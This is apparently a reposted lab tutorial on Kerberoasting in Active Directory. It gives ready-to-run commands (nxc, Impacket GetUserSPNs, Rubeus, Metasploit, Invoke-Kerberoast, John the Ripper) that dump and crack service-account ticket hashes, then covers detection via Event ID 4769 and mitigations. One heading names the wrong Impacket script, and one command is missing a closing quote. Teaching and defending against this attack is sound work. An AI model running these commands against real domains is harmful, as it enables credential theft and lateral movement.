Статья Kerberoasting Attack in Active Directory

[stihl]

This article explores Kerberoasting, a stealthy attack in Active Directory that exploits Service Principal Names (SPNs) to extract and crack TGS ticket hashes, revealing service account passwords. Unlike AS-REP Roasting, it abuses legitimate Kerberos requests. The post details lab setup, exploitation using Impacket, Rubeus, and NXC, and maps the attack to MITRE ATT&CK T1558.003. It also covers detection (Event ID 4769), AES enforcement, and mitigation strategies to defend against this threat.

Table of Contents​

• Kerb-roasting Walkthrough
• Prerequisites
• Lab Setup

Method for Exploitation – Kerberoasting Attack (T1558.003)

• Nxc
• Impacket-GetNPUsers
• targetedKerberoast
• Metasploit
• Rubeus
• Windows PowerShell – Kerberoast

Detection & Mitigation

Kerb-roasting Walkthrough​

Step 1: Attacker Gains Access to the Domain

The attacker first logs into the domain using a valid low-privileged user account. No special permissions or admin access is needed—just any domain user account will do.

Step 2: Enumerate SPNs (Service Principal Names)

The attacker scans the domain to find service accounts that have SPNs associated with them.

These SPNs represent services running on the network—like SQL, HTTP, etc.—and are tied to domain accounts.

Step 3: Request TGS for the SPN

Once the attacker finds SPNs, they request a Ticket Granting Service (TGS) ticket from the Domain Controller (KDC) for those services.

These tickets are encrypted using the NTLM hash of the service account’s password.

The attacker does not need the password to request the ticket—just the SPN.

Step 4: Extract the TGS Ticket

The attacker extracts the TGS ticket from memory or directly using tools.

Step 5: Crack the TGS Ticket Offline

The encrypted TGS ticket is now cracked offline, using tools like: hashcat, john the ripper

The attacker runs a brute-force or dictionary attack to recover the plaintext password of the service account.

Since the ticket is encrypted with the account’s hash, cracking the ticket = getting the password.

Step 6: Use the Cracked Password

If successful, the attacker now has credentials of the service account.

Many service accounts have high privileges (like local admin or even domain admin), or can be used to move laterally, access databases, or escalate privileges.

Prerequisites​

• Windows Server 2019 as Active Directory
• Kali Linux
• Tools: Impacket, Metasploit, nxc, targetedKerberoast, Rubeus, Poweshell
• Windows 10/11 – As Client

Lab Setup​

In this lab setup, we will assign an SPN to a service account, setting the stage for a kerberoasting attack simulation.

Create the AD Environment:​

To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller:​

• Install Windows Server (2016 or 2019 recommended).
• Promote it to a Domain Controller by adding the Active Directory Domain Services
• Set up the domain (e.g., local).

Create a Service Account with SPN:​

On the Domain Controller (DC), use setspn to assign an SPN to the user raj.

setspn -a hackingarticles/dc.ignite.local ignite.local\raj

• -a adds an SPN to the user.
• hackingarticles/dc.ignite.local is the SPN.
• local\raj is the service account.

Method for Exploitation – Kerberoasting Attack (T1558.003)​

Attackers (in this case, the Aarti user) can exploit service accounts with SPNs by requesting Kerberos service tickets (TGS) that the account’s NTLM hash encrypts. They can then crack these tickets offline to recover plaintext credentials.

NXC​

NXC (formerly CrackMapExec) can perform Kerberoasting efficiently.

nxc ldap 192.168.1.53 -u aarti -p Password@1 --kerberoasting hash.txt

Further, with the help of John the Ripper and a dictionary such as Rock You can help the attacker to brute force the weak password.

john -w=/usr/share/wordlists/rockyou.txt hash.txt

Impacket-GetNPUsers​

Use Impacket inbuilt module “GetUSerSPNs.py”, it is a python script that it discovers SPN, extract TGS and dump service Hash, this can be done with the help of the following command.

impacket-GetUserSPNs -request -dc-ip 192.168.1.53 ignite.local/aarti:Password@1

Then, it will dump the service hash and with the help of the dictionary, you can brute force it for extracting service passwords.

targetedKerberoast​

targetedKerberoast is a Python script that can print “kerberoast” hashes for user accounts that have a SPN set.

Clone the repository and install:

git clone https://github.com/ShutdownRepo/targetedKerberoast.git
cd targetedKerberoast

Run the attack:

./targetedKerberoast.py --dc-ip '192.168.1.53' -v -d 'ignite.local' -u 'aarti' -p 'Password@1

Metasploit​

The easiest way to enumerate Kerberoastable accounts is with the auxiliary/gather/get_user_spns module which internally leverages Impacket. This module will automatically query LDAP for Kerberoastable SPNs and request a Kerberos service ticket that may be encrypted using the weak password which can be bruteforced:

use auxiliary/gather/get_user_spns
set rhosts 192.168.1.53
set domain ignite.local
set user aarti
set pass Password@1
run

Windows

Rubeus​

Rubeus.exe is a terrific tool as it comes with a kerberoast module that discovers SPN, extracts TGS, and dump service Hash, which can be done with the help of the following command.

./Rubeus.exe kerberoast /outfile:hash.txt

Windows PowerShell – Kerberoast​

You can download Для просмотра ссылки Войди или Зарегистрируйся, a PowerShell script that is similar to the above module; it discovers the SPN, extracts TGS, and dumps the service hash. You can do this with the help of the following command.

Powershell -ep bypass
Import-Module .\Invoke-kerberoast.ps1
Invoke-kerberoast

Detection & Mitigation​

Detection​

Detecting Kerberoasting is crucial because attackers silently request service tickets, which they can later crack offline.

Key Windows Event ID: 4769

Detecting Kerberoasting is crucial because attackers silently request service tickets, which they can later crack offline.

What to Look for in Event ID 4769:

• Ticket Encryption Type: Often 0x17 (RC4) — the easiest to crack.
• Account Name: Look for unusual service account names or high-value users.
• Service Name (SPN): Identify rare or high-privilege SPNs that shouldn’t be accessed frequently.
• Client Address: If TGS requests come from non-privileged or unusual machines/users, it may be suspicious.

These indicators may suggest Kerberoasting activity, especially if seen from low-privileged accounts requesting tickets for service accounts.

Mitigation​

Protecting your Active Directory environment from Kerberoasting involves improving password hygiene, SPN configuration, and monitoring.

• Use Strong, Complex Passwords: Ensure service accounts (especially those with SPNs) use long, random, and unique passwords. Avoid reusing passwords or using dictionary words.
• Rotate Passwords Regularly: Implement scheduled password changes for service accounts — especially those tied to SPNs.
• Use Managed Service Accounts (gMSA): These accounts automatically handle complex password management and rotation, significantly reducing risk.
• Avoid Using Highly Privileged Accounts for Services: Don’t assign SPNs to Domain Admins or other privileged accounts. Use separate, least-privilege accounts for services.
• Disable RC4 Encryption: Enforce stronger encryption (AES128: 0x11, AES256: 0x12) via Group Policy:
• Monitor Event ID 4769 Regularly: Use SIEM tools or scripts to alert on unusual TGS requests.

Для просмотра ссылки Войди или Зарегистрируйся